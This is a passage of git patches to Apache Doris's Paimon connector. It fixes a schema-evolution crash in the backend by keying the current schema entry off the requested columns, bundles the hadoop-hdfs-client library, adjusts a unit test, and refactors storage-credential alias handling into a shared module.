verified: mvn -pl fe-core -am test -Dtest=PaimonMetadataOpsTest -Dmaven.build.cache.enabled=false -> Tests run: 6, Failures: 0, Errors: 0. (Only this test had the CatalogFactory-cast pattern.) Co-Authored-By: Claude Opus 4.8 (1M context) --- .../datasource/paimon/PaimonMetadataOpsTest.java | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/paimon/PaimonMetadataOpsTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/paimon/PaimonMetadataOpsTest.java index e4146faa690ba9..ae0bb3b3af53e4 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/paimon/PaimonMetadataOpsTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/paimon/PaimonMetadataOpsTest.java @@ -19,9 +19,7 @@ import org.apache.doris.common.DdlException; import org.apache.doris.common.UserException; -import org.apache.doris.datasource.CatalogFactory; import org.apache.doris.nereids.parser.NereidsParser; -import org.apache.doris.nereids.trees.plans.commands.CreateCatalogCommand; import org.apache.doris.nereids.trees.plans.commands.CreateTableCommand; import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; import org.apache.doris.nereids.trees.plans.logical.LogicalPlan; @@ -69,9 +67,14 @@ public static void beforeClass() throws Throwable { param.put("type", "paimon"); param.put("paimon.catalog.type", "filesystem"); param.put("warehouse", warehouse); - // create catalog - CreateCatalogCommand createCatalogCommand = new CreateCatalogCommand("paimon", true, "", "comment", param); - paimonCatalog = (PaimonExternalCatalog) CatalogFactory.createFromCommand(1, createCatalogCommand); + // Construct the legacy filesystem catalog directly. NOTE: "paimon" is in + // CatalogFactory.SPI_READY_TYPES, so CatalogFactory.createFromCommand now routes paimon through + // the connector-plugin SPI and returns a PluginDrivenExternalCatalog — it throws "No connector + // plugin loaded" when the plugin is not installed in connector_plugin_root (the case in a plain + // fe-core UT) and, even when loaded, is not castable to the legacy PaimonExternalCatalog. This + // test exercises the still-live legacy PaimonMetadataOps, so build the legacy catalog directly + // here rather than through the SPI-routed factory. + paimonCatalog = new PaimonFileExternalCatalog(1, "paimon", null, param, "comment"); paimonCatalog.makeSureInitialized(); // create db ops = new PaimonMetadataOps(paimonCatalog, paimonCatalog.catalog); From 905433d914bcef7f519f54d50a36a5856b6588e6 Mon Sep 17 00:00:00 2001 From: morningman Date: Sun, 14 Jun 2026 14:21:40 +0800 Subject: [PATCH 063/128] =?UTF-8?q?fix:=20FIX-PAIMON-SCHEMA-DICT-SLOTS=20?= =?UTF-8?q?=E2=80=94=20build=20native=20-1=20schema=20entry=20from=20reque?= =?UTF-8?q?sted=20columns=20(CI=20969249)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: a single BE FATAL (Check failed: children.contains(table_column_name), table_schema_change_helper.h:166 <- vparquet_reader.cpp:488) on "SELECT * FROM test_paimon_spark.test_schema_change" aborted the whole BE for the rest of the run, cascading into ~47 "No backend available as scan node" collateral failures. FIX-SCHEMA-EVOLUTION (01b76422b54) added current_schema_id=-1 + history_schema_info, which switched BE from name-based file<->table matching onto the field-id path. That path keys the table-side StructNode by the -1/current entry's field names and then looks up each query slot (base_ctx->column_names) in it; a slot absent from the -1 entry trips the DCHECK. The connector built the -1 entry from an INDEPENDENT paimon-SDK read (fileStoreTable.schema()) — a different source than the Doris column list fe-core turns into the BE scan slots. When the two skew (this Spark table did ALTER TABLE ADD COLUMN after its last snapshot, so the resolved schema lagged the latest schema the slots come from) the added column was missing from the -1 entry -> abort. Legacy PaimonScanNode.doInitialize built the -1 entry from getTargetTable().getColumns() — the SAME list as the slots — so the names matched by construction and the lookup could never miss. Restore that invariant connector-side: buildSchemaEvolutionParam now keys the -1 entry off the requested `columns` via selectCurrentSchemaFields, matching each to a paimon DataField by name — the resolved (snapshot-pinned) schema wins on a name collision (time-travel + rename stay correct), with the fresh latest() schema as a fallback so an add-column-after-snapshot column is carried with its real field id (older files then fill NULL, the correct result). current_schema_id stays -1 (legacy sentinel). Fails loud if a requested column is in neither schema. +4 unit tests (add-column-after-snapshot, rename time-travel collision, fail-loud, empty-columns count scan). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 95 ++++++++++++++++--- .../paimon/PaimonScanPlanProviderTest.java | 67 +++++++++++++ 2 files changed, 149 insertions(+), 13 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index d56f3463423487..822e8d9417bec9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -52,6 +52,7 @@ import org.apache.paimon.rest.RESTToken; import org.apache.paimon.rest.RESTTokenFileIO; import org.apache.paimon.schema.SchemaManager; +import org.apache.paimon.schema.TableSchema; import org.apache.paimon.table.FileStoreTable; import org.apache.paimon.table.Table; import org.apache.paimon.table.source.DataSplit; @@ -620,7 +621,7 @@ public Map getScanNodeProperties( // session forces JNI (force_jni_scanner) — in both cases every split goes JNI and never consults // the dict (FIX-FORCE-JNI-SCANNER: honor the same session escape hatch the native router uses). if (!paimonHandle.isForceJni() && !isForceJniScannerEnabled(session)) { - buildSchemaEvolutionParam(table).ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); + buildSchemaEvolutionParam(table, columns).ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); } return props; @@ -1084,17 +1085,24 @@ public List getDeleteFiles(TTableFormatFileDesc tableFormatParams) { * {@link #applySchemaEvolutionParam} only has to copy the two fields back.

      * *

      Parity with legacy {@code PaimonScanNode}: {@code current_schema_id = -1} and the current/target - * schema is pushed under that sentinel. Crucially it is built from {@code table.schema()} — the - * resolved (snapshot-PINNED) schema, the SAME schema the query's tuple slots use — so a time-travel - * read keys BE's table-side {@code StructNode} by the pinned column names (legacy built the -1 entry - * from {@code getTargetTable().getColumns()}, also snapshot-aware; {@code schemaManager().latest()} - * would wrongly use the absolute latest schema). Per-schema historical entries are added for every - * committed schema id ({@link SchemaManager#listAllIds()}) so any native file's {@code schema_id} is - * covered (BE fails loud — {@code "miss table/file schema info"} — if a referenced id is absent). - * Schema reads that throw are allowed to propagate (fail loud, mirroring legacy - * {@code putHistorySchemaInfo}).

      + * schema is pushed under that sentinel. Crucially the -1 entry's top-level field set is built from the + * REQUESTED {@code columns} — the authoritative Doris slot list fe-core also turns into BE's + * {@code base_ctx->column_names} — NOT from an independent paimon-SDK schema read. This restores the + * legacy invariant ({@code PaimonScanNode.doInitialize} -> {@code ExternalUtil.initSchemaInfo(-1, + * getTargetTable().getColumns())}): the -1 entry's names == the scan-slot names BY CONSTRUCTION, so + * BE's {@code by_table_field_id} / {@code children_column_exists} lookup + * ({@code table_schema_change_helper.h:166}) can never miss when the FE-cached schema and the + * scan-time paimon schema skew. (CI 969249: a column added after the last snapshot was present in the + * FE slots but absent from the resolved {@code table.schema()} read, so the old "build the -1 entry + * from {@code table.schema()}" tripped the BE DCHECK and aborted the whole BE.) Each column's field id + * and nested type are matched BY NAME against the resolved (snapshot-pinned for time-travel, latest + * for plain) schema, with the fresh latest schema as a fallback (see + * {@link #resolveCurrentSchemaFields}). Per-schema historical entries are added for every committed + * schema id ({@link SchemaManager#listAllIds()}) so any native file's {@code schema_id} is covered (BE + * fails loud — {@code "miss table/file schema info"} — if a referenced id is absent). Schema reads + * that throw are allowed to propagate (fail loud, mirroring legacy {@code putHistorySchemaInfo}).

      */ - private Optional buildSchemaEvolutionParam(Table table) { + private Optional buildSchemaEvolutionParam(Table table, List columns) { if (!(table instanceof FileStoreTable)) { return Optional.empty(); } @@ -1102,11 +1110,12 @@ private Optional buildSchemaEvolutionParam(Table table) { SchemaManager schemaManager = fileStoreTable.schemaManager(); List history = new ArrayList<>(); - // Current/target schema under the -1 sentinel, from the resolved (snapshot-pinned) schema. Its + // Current/target schema under the -1 sentinel, keyed off the REQUESTED columns (see javadoc). Its // top-level names are lowercased: BE keys the table-side StructNode by these names VERBATIM and the // native reader looks them up by the lowercase Doris slot name (legacy ExternalUtil/parseSchema // parity). Nested + historical names stay paimon-cased (legacy PaimonUtil.getSchemaInfo). - history.add(buildSchemaInfo(CURRENT_SCHEMA_ID, fileStoreTable.schema().fields(), true)); + history.add(buildSchemaInfo(CURRENT_SCHEMA_ID, + resolveCurrentSchemaFields(fileStoreTable, schemaManager, columns), true)); // One entry per committed schema id so every native file's schema_id resolves. for (Long schemaId : schemaManager.listAllIds()) { history.add(buildSchemaInfo(schemaId, schemaManager.schema(schemaId).fields(), false)); @@ -1114,6 +1123,66 @@ private Optional buildSchemaEvolutionParam(Table table) { return Optional.of(encodeSchemaEvolution(CURRENT_SCHEMA_ID, history)); } + /** + * Resolves the current/target (-1 entry) field list from the requested {@code columns}, matching each + * to a paimon {@link DataField} BY NAME (case-insensitive). The resolved (snapshot-pinned) schema wins + * on a name collision so a time-travel read keys the pinned column names (and a renamed column resolves + * its pinned id before ever reaching the fallback); the fresh latest schema is consulted as a fallback + * so a column added after the last snapshot — present in the FE slots but lagging the resolved table + * instance (CI 969249) — is still carried with its real field id (an add-only column is then absent + * from older files and BE fills it NULL, the correct result). Keying off the requested columns rather + * than a paimon schema read is what guarantees the -1 entry's names equal BE's scan-slot names, the + * legacy invariant the field-id matcher relies on. When {@code columns} is empty (e.g. a count-only + * scan with no projected slots) there is nothing to mismatch, so it falls back to the resolved + * schema's fields. Fails loud if a requested column is in neither schema (a genuine FE/connector + * inconsistency) rather than silently dropping it. + */ + private static List resolveCurrentSchemaFields(FileStoreTable table, + SchemaManager schemaManager, List columns) { + List columnNames = new ArrayList<>(columns == null ? 0 : columns.size()); + if (columns != null) { + for (ConnectorColumnHandle handle : columns) { + columnNames.add(((PaimonColumnHandle) handle).getName()); + } + } + List latestFields = schemaManager.latest() + .map(TableSchema::fields).orElse(Collections.emptyList()); + return selectCurrentSchemaFields(table.schema().fields(), latestFields, columnNames); + } + + /** + * Pure field-selection core of {@link #resolveCurrentSchemaFields} (package-private for unit testing). + * Returns one {@link DataField} per requested {@code columnNames}, matched case-insensitively against + * {@code resolvedFields} first (so the snapshot-pinned schema wins, keeping time-travel + rename + * correct) then {@code latestFields} (so an add-column-after-snapshot column the resolved instance lags + * is still carried with its real field id). Empty {@code columnNames} (count-only scan) -> the resolved + * fields unchanged. Throws if a requested column is in neither schema (fail loud, not silent drop). + */ + static List selectCurrentSchemaFields(List resolvedFields, + List latestFields, List columnNames) { + if (columnNames == null || columnNames.isEmpty()) { + return resolvedFields; + } + Map byName = new HashMap<>(); + // Latest first, resolved second so the resolved (snapshot-pinned) field wins on a name collision. + for (DataField f : latestFields) { + byName.put(f.name().toLowerCase(Locale.ROOT), f); + } + for (DataField f : resolvedFields) { + byName.put(f.name().toLowerCase(Locale.ROOT), f); + } + List currentFields = new ArrayList<>(columnNames.size()); + for (String name : columnNames) { + DataField field = byName.get(name.toLowerCase(Locale.ROOT)); + if (field == null) { + throw new RuntimeException("paimon schema-evolution: requested column '" + name + + "' not found in the resolved or latest schema"); + } + currentFields.add(field); + } + return currentFields; + } + /** * Serializes the schema dictionary into a base64 TBinaryProtocol blob, carried by a throwaway * {@link TFileScanRangeParams} (the exact thrift target so {@link #applySchemaEvolutionParam} only diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index d494008615e0b4..43e70b3fd892e6 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -1529,6 +1529,73 @@ public void buildSchemaInfoLowercasesTopLevelButPreservesNestedNames() { "historical entry keeps paimon casing"); } + @Test + public void selectCurrentSchemaFieldsCarriesAddColumnAfterSnapshot() { + // WHY (CI 969249 crash): the -1/current entry MUST contain every requested scan slot, or BE's + // children_column_exists (table_schema_change_helper.h:166) DCHECK-aborts the whole BE. A paimon + // ALTER TABLE ADD COLUMN bumps the table schema WITHOUT a new snapshot, so the resolved + // (snapshot-pinned) table.schema() can lag the latest schema the FE slots come from. Building the + // -1 entry from the resolved schema alone (the old code) dropped the added column -> crash. Keying + // off the requested columns + a fresh-latest fallback carries it with its REAL field id (so newer + // files that DO have it still read data; older files fill NULL). MUTATION: drop the latest fallback + // -> "name" missing from the result -> the production DCHECK abort. + List resolved = Arrays.asList(new DataField(0, "id", DataTypes.INT())); + List latest = Arrays.asList( + new DataField(0, "id", DataTypes.INT()), + new DataField(1, "name", DataTypes.STRING())); + + List current = PaimonScanPlanProvider.selectCurrentSchemaFields( + resolved, latest, Arrays.asList("id", "name")); + + Assertions.assertEquals(2, current.size()); + Assertions.assertEquals("id", current.get(0).name()); + Assertions.assertEquals(0, current.get(0).id()); + Assertions.assertEquals("name", current.get(1).name(), "added column must be present (no crash)"); + Assertions.assertEquals(1, current.get(1).id(), "added column carries its real latest field id"); + } + + @Test + public void selectCurrentSchemaFieldsResolvedWinsOnNameCollisionForTimeTravelRename() { + // WHY: a time-travel read pins an OLD snapshot whose schema has the pre-rename name; the FE slots + // use that pinned name. The -1 entry must key by the pinned name + pinned field id so BE matches + // the file's field id. The resolved (pinned) schema must therefore WIN over the latest (renamed) + // schema on a name collision, and the pinned old name must resolve in the pinned schema BEFORE the + // latest fallback is consulted. MUTATION: prefer latest -> "full_name" keyed -> the pinned-name + // slot "fullname" misses children -> crash / NULL. + List pinned = Arrays.asList(new DataField(5, "fullname", DataTypes.STRING())); + List latest = Arrays.asList(new DataField(5, "full_name", DataTypes.STRING())); + + List current = PaimonScanPlanProvider.selectCurrentSchemaFields( + pinned, latest, Arrays.asList("fullname")); + + Assertions.assertEquals(1, current.size()); + Assertions.assertEquals("fullname", current.get(0).name(), "pinned name wins for time travel"); + Assertions.assertEquals(5, current.get(0).id()); + } + + @Test + public void selectCurrentSchemaFieldsFailsLoudOnUnknownRequestedColumn() { + // WHY (Rule 12 / fail loud): a requested slot absent from BOTH the resolved and latest schema is a + // genuine FE/connector inconsistency; surface it as a clean per-query failure rather than silently + // dropping it (which would re-create the BE children mismatch). MUTATION: silent skip -> crash. + List resolved = Arrays.asList(new DataField(0, "id", DataTypes.INT())); + Assertions.assertThrows(RuntimeException.class, () -> + PaimonScanPlanProvider.selectCurrentSchemaFields( + resolved, Collections.emptyList(), Arrays.asList("id", "ghost"))); + } + + @Test + public void selectCurrentSchemaFieldsEmptyColumnsReturnsResolved() { + // WHY: a count-only scan projects no slots, so there is nothing to mismatch; fall back to the + // resolved schema's fields verbatim (no behavior change for that path). + List resolved = Arrays.asList( + new DataField(0, "id", DataTypes.INT()), + new DataField(1, "name", DataTypes.STRING())); + + Assertions.assertSame(resolved, PaimonScanPlanProvider.selectCurrentSchemaFields( + resolved, Collections.emptyList(), Collections.emptyList())); + } + @Test public void getScanNodePropertiesSkipsSchemaEvolutionForNonFileStoreTable() { // WHY: only paimon FileStoreTables take the native path; sys-tables / fakes read via JNI and never From a282ae5e8e7944405e720fe6f3d112d355b6edac Mon Sep 17 00:00:00 2001 From: morningman Date: Sun, 14 Jun 2026 14:21:54 +0800 Subject: [PATCH 064/128] =?UTF-8?q?fix:=20FIX-PAIMON-HDFS-CLIENT=20?= =?UTF-8?q?=E2=80=94=20bundle=20hadoop-hdfs-client=20for=20filesystem=20ca?= =?UTF-8?q?talogs=20over=20hdfs=20(CI=20969249)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: filesystem-metastore paimon catalogs on hdfs:// warehouses failed to create with org.apache.hadoop.fs.UnsupportedFileSystemException: No FileSystem for scheme "hdfs" (43x in fe.log), swallowed by ExternalCatalog.buildDbForInit into a misleading "Unknown database" (test_paimon_catalog_varbinary, test_catalog_upgrade_test). The plugin runs child-first and no longer carries an hdfs FileSystem impl: hadoop-common's service file registers only Local/viewfs/Har/Http(s), and FIX-PAIMON-HMS-THRIFT-SHADE (5ac8c302596) made hive-common in fe-connector-paimon-hive-shade, so maven-shade dropped it AND its transitive hadoop-client-api — the prior carrier of DistributedFileSystem. HMS-flavor catalogs (thrift metadata) and filesystem-on-S3 (hadoop-aws) were unaffected, which is why only hdfs filesystem catalogs broke. Add org.apache.hadoop:hadoop-hdfs-client (runtime, ${hadoop.version}) — it carries DistributedFileSystem + the hdfs FileSystem service registration and reuses the plugin's single hadoop-common FileSystem (hadoop-common excluded to keep exactly one copy — no cross-loader split). Same self-contained child-first pattern as hadoop-aws/hadoop-huaweicloud. Verified on the assembled plugin zip: DistributedFileSystem carriers=1, FileSystem.class carriers=1, hdfs service entry present. Also corrects the now-false pom comment claiming hadoop-client-api is transitively bundled. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 39 ++++++++++++++++++--- 1 file changed, 35 insertions(+), 4 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index b7778961b553c6..2fb2a62f59e47f 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -94,10 +94,41 @@ under the License. hadoop-common - + + org.apache.hadoop + hadoop-hdfs-client + ${hadoop.version} + runtime + + + org.apache.hadoop + hadoop-common + + + + + + + org.apache.hadoop + hadoop-mapreduce-client-core + test + + + ${project.groupId} + fe-property + ${project.version} + + ${project.groupId} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index a8608754b69442..796e0e9262be14 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -17,6 +17,8 @@ package org.apache.doris.connector.paimon; +import org.apache.doris.property.storage.StorageProperties; + import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; @@ -77,132 +79,6 @@ public final class PaimonCatalogFactory { /** Hadoop S3A standard prefix (legacy {@code AbstractPaimonProperties.FS_S3A_PREFIX}). */ private static final String FS_S3A_PREFIX = "fs.s3a."; - // Canonical Doris storage aliases (ported from fe-core S3Properties / OSSProperties - // @ConnectorProperty names), listed in legacy priority order. Kept as literal strings to avoid - // importing fe-core StorageProperties. Added by FIX-STORAGE-CREDS: before this, a catalog - // created with the DOCUMENTED canonical keys (s3.access_key / oss.access_key / AWS_*) had every - // credential silently dropped by applyStorageConfig (only paimon.* / raw fs.* were recognized), - // so a private S3/OSS bucket was hit with no credentials. These are translated to the Hadoop - // fs.s3a.* / fs.oss.* keys the live FileIO actually reads. - private static final String[] S3_ACCESS_KEY_ALIASES = { - "s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "s3.access-key-id"}; - private static final String[] S3_SECRET_KEY_ALIASES = { - "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "s3.secret-access-key"}; - private static final String[] S3_SESSION_TOKEN_ALIASES = { - "s3.session_token", "session_token", "s3.session-token", "AWS_TOKEN"}; - private static final String[] S3_ENDPOINT_ALIASES = { - "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; - private static final String[] S3_REGION_ALIASES = { - "s3.region", "AWS_REGION", "region", "REGION"}; - - private static final String[] OSS_ACCESS_KEY_ALIASES = { - "oss.access_key", "fs.oss.accessKeyId", "dlf.access_key"}; - private static final String[] OSS_SECRET_KEY_ALIASES = { - "oss.secret_key", "fs.oss.accessKeySecret", "dlf.secret_key"}; - private static final String[] OSS_SESSION_TOKEN_ALIASES = { - "oss.session_token", "fs.oss.securityToken"}; - private static final String[] OSS_ENDPOINT_ALIASES = { - "oss.endpoint", "fs.oss.endpoint"}; - private static final String[] OSS_REGION_ALIASES = {"oss.region", "dlf.region"}; - - // S3A connection-tuning aliases (ported from each legacy *Properties @ConnectorProperty names). NOTE the - // defaults DIVERGE by backend: S3Properties = 50/3000/1000, while OSS/COS/OBS = 100/10000/10000. Emitting - // one shared default would silently mis-tune AWS S3 (round-3 re-review, FIX-FECONF-STORAGE-PARITY). - private static final String[] S3_MAX_CONN_ALIASES = {"s3.connection.maximum", "AWS_MAX_CONNECTIONS"}; - private static final String[] S3_REQ_TIMEOUT_ALIASES = { - "s3.connection.request.timeout", "AWS_REQUEST_TIMEOUT_MS"}; - private static final String[] S3_CONN_TIMEOUT_ALIASES = {"s3.connection.timeout", "AWS_CONNECTION_TIMEOUT_MS"}; - private static final String[] S3_PATH_STYLE_ALIASES = {"use_path_style", "s3.path-style-access"}; - - private static final String[] OSS_MAX_CONN_ALIASES = {"oss.connection.maximum", "s3.connection.maximum"}; - private static final String[] OSS_REQ_TIMEOUT_ALIASES = { - "oss.connection.request.timeout", "s3.connection.request.timeout"}; - private static final String[] OSS_CONN_TIMEOUT_ALIASES = {"oss.connection.timeout", "s3.connection.timeout"}; - private static final String[] OSS_PATH_STYLE_ALIASES = { - "oss.use_path_style", "use_path_style", "s3.path-style-access"}; - - // COS aliases (ported from COSProperties @ConnectorProperty names). Detection is independent of these - // (cos.* key OR a "myqcloud.com" endpoint/warehouse), so the value lists may safely include the shared - // s3.*/AWS_* aliases legacy COSProperties accepts. - private static final String[] COS_ACCESS_KEY_ALIASES = { - "cos.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}; - private static final String[] COS_SECRET_KEY_ALIASES = { - "cos.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}; - private static final String[] COS_SESSION_TOKEN_ALIASES = { - "cos.session_token", "s3.session_token", "s3.session-token", "session_token"}; - private static final String[] COS_ENDPOINT_ALIASES = { - "cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; - private static final String[] COS_REGION_ALIASES = { - "cos.region", "s3.region", "AWS_REGION", "region", "REGION"}; - private static final String[] COS_MAX_CONN_ALIASES = {"cos.connection.maximum", "s3.connection.maximum"}; - private static final String[] COS_REQ_TIMEOUT_ALIASES = { - "cos.connection.request.timeout", "s3.connection.request.timeout"}; - private static final String[] COS_CONN_TIMEOUT_ALIASES = {"cos.connection.timeout", "s3.connection.timeout"}; - private static final String[] COS_PATH_STYLE_ALIASES = { - "cos.use_path_style", "use_path_style", "s3.path-style-access"}; - - // OBS aliases (ported from OBSProperties @ConnectorProperty names). - private static final String[] OBS_ACCESS_KEY_ALIASES = { - "obs.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}; - private static final String[] OBS_SECRET_KEY_ALIASES = { - "obs.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}; - private static final String[] OBS_SESSION_TOKEN_ALIASES = { - "obs.session_token", "s3.session_token", "s3.session-token", "session_token"}; - private static final String[] OBS_ENDPOINT_ALIASES = { - "obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; - private static final String[] OBS_REGION_ALIASES = { - "obs.region", "s3.region", "AWS_REGION", "region", "REGION"}; - private static final String[] OBS_MAX_CONN_ALIASES = {"obs.connection.maximum", "s3.connection.maximum"}; - private static final String[] OBS_REQ_TIMEOUT_ALIASES = { - "obs.connection.request.timeout", "s3.connection.request.timeout"}; - private static final String[] OBS_CONN_TIMEOUT_ALIASES = {"obs.connection.timeout", "s3.connection.timeout"}; - private static final String[] OBS_PATH_STYLE_ALIASES = { - "obs.use_path_style", "use_path_style", "s3.path-style-access"}; - - // MinIO aliases (ported from MinioProperties @ConnectorProperty names, in legacy priority order). MinIO is - // S3A-compatible (legacy MinioProperties extends AbstractS3CompatibleProperties, schema "s3"), so — unlike - // COS/OBS — it emits ONLY the shared S3A base block (fs.s3a.* + fs.s3.impl), no MinIO-specific impl keys: - // a MinIO bucket is reached as an ordinary S3A instance over s3://. The value lists include the shared - // s3.*/AWS_* fallbacks legacy MinioProperties accepts; detection keys off the dedicated minio.* prefix only - // (see applyCanonicalMinioConfig). Tuning defaults match MinioProperties (100/10000/10000, = OBJ_STORE_*); - // the region defaults to us-east-1 (MinioProperties.region default). - private static final String[] MINIO_ACCESS_KEY_ALIASES = { - "minio.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "ACCESS_KEY", "access_key", "s3.access_key"}; - private static final String[] MINIO_SECRET_KEY_ALIASES = { - "minio.secret_key", "s3.secret-access-key", "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}; - private static final String[] MINIO_SESSION_TOKEN_ALIASES = { - "minio.session_token", "s3.session-token", "s3.session_token", "session_token"}; - private static final String[] MINIO_ENDPOINT_ALIASES = { - "minio.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; - private static final String[] MINIO_REGION_ALIASES = { - "minio.region", "s3.region", "AWS_REGION", "region", "REGION"}; - private static final String[] MINIO_MAX_CONN_ALIASES = {"minio.connection.maximum", "s3.connection.maximum"}; - private static final String[] MINIO_REQ_TIMEOUT_ALIASES = { - "minio.connection.request.timeout", "s3.connection.request.timeout"}; - private static final String[] MINIO_CONN_TIMEOUT_ALIASES = {"minio.connection.timeout", "s3.connection.timeout"}; - private static final String[] MINIO_PATH_STYLE_ALIASES = { - "minio.use_path_style", "use_path_style", "s3.path-style-access"}; - // Legacy MinioProperties.region default (S3Properties has none; emitting one shared default would mis-set it). - private static final String MINIO_DEFAULT_REGION = "us-east-1"; - - // Per-backend tuning defaults (legacy *Properties field defaults). - private static final String S3_DEFAULT_MAX_CONN = "50"; - private static final String S3_DEFAULT_REQ_TIMEOUT = "3000"; - private static final String S3_DEFAULT_CONN_TIMEOUT = "1000"; - private static final String OBJ_STORE_DEFAULT_MAX_CONN = "100"; - private static final String OBJ_STORE_DEFAULT_REQ_TIMEOUT = "10000"; - private static final String OBJ_STORE_DEFAULT_CONN_TIMEOUT = "10000"; - private static final String DEFAULT_PATH_STYLE = "false"; - - private static final String S3A_IMPL = "org.apache.hadoop.fs.s3a.S3AFileSystem"; - private static final String S3A_SIMPLE_CRED_PROVIDER = - "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"; - // JindoOSS impls (literals; avoid the Aliyun compile dep, same pattern as appendDlfOptions). - private static final String JINDO_OSS_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; - private static final String JINDO_OSS_ABSTRACT_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; - // Native Huawei OBS impls (literals; avoid the hadoop-obs compile dep). Used only when classpath-available. - private static final String OBS_NATIVE_IMPL = "org.apache.hadoop.fs.obs.OBSFileSystem"; - private static final String OBS_NATIVE_ABSTRACT_IMPL = "org.apache.hadoop.fs.obs.OBS"; private PaimonCatalogFactory() { } @@ -509,11 +385,14 @@ public static Configuration buildHadoopConfiguration(Map props) * */ private static void applyStorageConfig(Map props, BiConsumer setter) { - applyCanonicalS3Config(props, setter); - applyCanonicalMinioConfig(props, setter); - applyCanonicalOssConfig(props, setter); - applyCanonicalCosConfig(props, setter); - applyCanonicalObsConfig(props, setter); + // Canonical object-store alias -> fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.* translation, delegated to the shared + // fe-property module (replaces the hand-ported applyCanonicalS3/Minio/Oss/Cos/Obs blocks that diverged and + // caused the MinIO bug). It detects each object-store family from the raw props and emits the same Hadoop + // keys legacy did; HDFS contributes nothing here (handled by the raw passthrough below), matching legacy + // (applyStorageConfig never had an HDFS canonical block). + StorageProperties.buildObjectStorageHadoopConfig(props).forEach(setter); + // Connector-specific (NOT in fe-property): paimon.* prefix re-key + raw fs./dfs./hadoop. passthrough, + // run LAST so explicit fs.s3a.* keys overlay the canonical translation (last-write-wins). props.forEach((key, value) -> { for (String prefix : USER_STORAGE_PREFIXES) { if (key.startsWith(prefix)) { @@ -527,219 +406,6 @@ private static void applyStorageConfig(Map props, BiConsumer props, BiConsumer setter) { - String ak = firstNonBlank(props, S3_ACCESS_KEY_ALIASES); - String sk = firstNonBlank(props, S3_SECRET_KEY_ALIASES); - String endpoint = firstNonBlank(props, S3_ENDPOINT_ALIASES); - String region = firstNonBlank(props, S3_REGION_ALIASES); - String token = firstNonBlank(props, S3_SESSION_TOKEN_ALIASES); - // Only emit S3A config when the user actually configured an S3-style storage key. - if (ak == null && endpoint == null && region == null) { - return; - } - // Endpoint-from-region (legacy S3Properties.getEndpointFromRegion): a region-only AWS S3 catalog - // (no explicit endpoint) derives https://s3..amazonaws.com so the FE FileIO can resolve it. - if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { - endpoint = "https://s3." + region + ".amazonaws.com"; - } - applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, - firstNonBlankOrDefault(props, S3_DEFAULT_MAX_CONN, S3_MAX_CONN_ALIASES), - firstNonBlankOrDefault(props, S3_DEFAULT_REQ_TIMEOUT, S3_REQ_TIMEOUT_ALIASES), - 